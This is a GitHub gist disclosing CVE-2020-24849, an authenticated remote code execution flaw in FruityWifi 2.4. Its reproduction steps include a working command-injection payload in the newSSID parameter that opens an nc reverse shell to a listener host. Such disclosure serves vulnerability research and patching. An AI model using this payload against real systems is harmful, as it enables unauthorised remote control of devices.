Skip to content

Instantly share code, notes, and snippets.

@harsh-bothra
Last active November 3, 2020 09:20
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save harsh-bothra/f899045b16bbba264628d79d52c07c22 to your computer and use it in GitHub Desktop.
CVE-2020-24849 - FruityWifi Remote Code Execution
Product: FruityWifi
CVE: CVE-2020-24849
Version: (, 2.4) - Tested on version 2.4
Vulnerability: Remote Code Execution
Vulnerability Description: A remote code execution vulnerability is identified in FruityWifi through 2.4.Due to improperly escaped shell metacharacters obtained from the POST request at the page_config_adv.php page, it is possible to perform remote code execution by an authenticated attacker. This is similar to CVE-2018-17317.
# Steps to Reproduce:
1. Login with credentials to the application.
2. Go to "https://vuln_ip/scripts/page_config_adv.php".
3. Intercept the request then change request method to POST.
4. Add "newSSID" parameter in POST body and insert payload (newSSID=A\"B'C";rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.1+4441+>/tmp/f;#) and start nc listener on 4441 port.
Note: In order to bypass, we need to satisfy the quotes then insert our payload. Send the request, you will be greeted with a shell.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment